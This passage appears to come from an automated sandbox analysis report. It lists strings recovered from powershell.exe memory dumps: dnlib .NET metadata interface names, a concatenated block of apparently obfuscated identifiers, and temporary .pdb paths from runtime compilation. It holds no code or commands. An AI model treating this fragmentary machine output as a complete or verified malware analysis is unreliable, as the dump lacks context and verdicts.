binaryresourcedatadnlib.dotnet.mdrawtyperefrowyph8wk4l4tadoooo5jp5dnlib.ioimagestreamcreatordnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresource<getenumerator_nolock>d__45dnlib.dotnettyperefjkptur4v7edha9yyco6nuwbuvh4vndwhggklqkq7dnlib.dotnetpublickeydnlib.dotnetiassemblyreffindertlim3k4bfawabnjdnhhydnlib.dotnet.mdrawgenericparamconstraintrow__staticarrayinittypesize=24teims3le830y9ez4cd0buengtl3rj
                    Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.542528048.00000000129FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: omhvy2rvxnqqup8sgutvz52hrrqdbddoybrls7dnlib.dotnet.emitnativemethodbodybvnbffsbyqatirpu5kednlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib.dotnetcaargumentadzfqw4etn2i2kb4bmljbxndcr4eldug6gn2ftbbdnlib.dotnetcorlibtypesigeiwh4p5emywfmaprbndughu5q53ncbmhb2s4uydnlib.dotnetelementtypey8tjb34txspg6vfeevmzc7darj4twldqjhfdqkuydnlib.dotnet.writernetresourceslpsi084jey4ecg6xhii2nsyimvixbra92ynyv0nrhpnvmieqs8grwehli4dnlib.dotnetszarraysigdnlib.dotnetmanifestresourceattributesgsnlgd4llsoan7qhm2gms3afae4lx1c5l15ssgakdnlib.dotnetmethodoverridednlib.dotnet.writerdeclsecuritywriterdnlib.dotnet.mdrawgenericparamrowdnlib.dotnetiassemblynmcarugvljx3c3gdr3muqmnsogzxivjwmy12vldnlib.dotnetgenericargumentsdnlib.dotnetfieldsigdnlib.dotnetexportedtypednlib.dotnetimporteroptionsn8dmuy4vrpcccyqcksdcbpqsof4vd1stlmrpaki6dnlib.threadinglistiteratedelegate`1origsection<findconstructors>d__279dnlib.peimagentheadersdnlib.threadingextensionsdnlib.dotnetmodulecontextdnlib.dotneteventattributesxguw5i219x7tceiv1lgdnlib.dotnet.writerhotpooldnlib.dotnet.writericustomattributewriterhelperdnlib.dotnetalltypeshelperakyj6voccoa7h4muebxzdnlib.dotnetsignaturealgorithmdnlib.dotnetmodulerefdnlib.iofilesectiondnlib.threadingenumerableiteratealldelegate`1cqw5yu4hkptbpg6tdletro5q7e4hivvskgc5vrlodnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsigdnlib.iomemoryimagestreamgwjjuf4rswiuhoy99udkh0p0pu4r8jcmbomq9fvxdnlib.dotnetmoduledefdnlib.dotnetgenericparamconstraintdnlib.dotnet.mdstreamheaderdnlib.ioibinaryreaderdnlib.dotnetimemberforwardeddnlib.dotnet.mdrawfieldrvarowdnlib.dotnetmarshalblobreaderdnlib.dotnet.writerhottablexls2tx4v9icafzxd4m3kdnlib.dotnetsigcomparerdnlib.iohomeqqjxnvo8c7u2jeeh8f7pdnlib.dotnettypeattributesdnlib.dotnetclasslayoutdnlib.dotnet.writerwin32resourceschunkdnlib.utilsilistlistener`1dnlib.dotnet.mdrawassemblyrefprocessorrowdnlib.dotnetigenericparameterproviderdnlib.ioapidnlib.dotnet.mdusstreamdnlib.dotnet.mdstringsstreamdnlib.dotnetassemblyresolveexception<>c__displayclass3_0`1dnlib.dotnetsafearraymarshaltypez0lbwy4ejn8n7vanfykstzcqol4em9ifp7vedagydnlib.dotnetembeddedresourcednlib.dotnet.mdstorageflagsdnlib.dotnetinterfaceimpluserdnlib.dotnetimporterdnlib.dotnet.mdcolumnsize<findassembliesmodulesearchpaths>d__60vk8pvosix8lt3hhalecdnlib.dotnetresourcetypednlib.dotnet.emitmethodbodyreaderdnlib.dotnet.emitextensionswaatps4jdl8x42ihwcaylhe12mvmd4p1px5a5duwfehufv647t8pheb8iodnlib.dotnetfieldequalitycomparerdnlib.dotnetiimplementationdnlib.dotnet.mdraweventmaprowdnlib.dotnet.mdrawparamrowdnlib.dotnetistringdecrypterf91kooqgze2k03ehdeagxxrrqqiumag2qbgmhodnlib.dotnetpublickeybasednlib.dotnet.mdrawmethodptrrowpf5fgg4fihz1nm3bjq4jnxzdoh4f5vkwydgidxaednlib.dotnetfiledefdnlib.dotnet.mdrawpropertyrowdnlib.dotnet.writerhottable20qcikqi7jvlko2enmpydardhpx7m63ebwuiuhq4dnlib.ioioextensionsrhiarvoesuzeg8cqbmcxxlyplroeriknfdspsvlkdnlib.dotnet.writerextensionsdnlib.dotnetparameterlistyykz1zwjm3s4lejefmxdnlib.dotnetmethoddefuserdnlib.dotnetutf8stringequalitycomparerdnlib
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.pdbhP source: powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.538241032.000007FE89A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539125948.000007FE89C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.553778518.000007FE89C33000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.542528048.00000000129FE000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: .pdb= source: powershell.exe, 00000013.00000002.514899647.000000001A5DE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.pdb source: powershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.538241032.000007FE89A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539125948.000007FE89C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.553778518.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
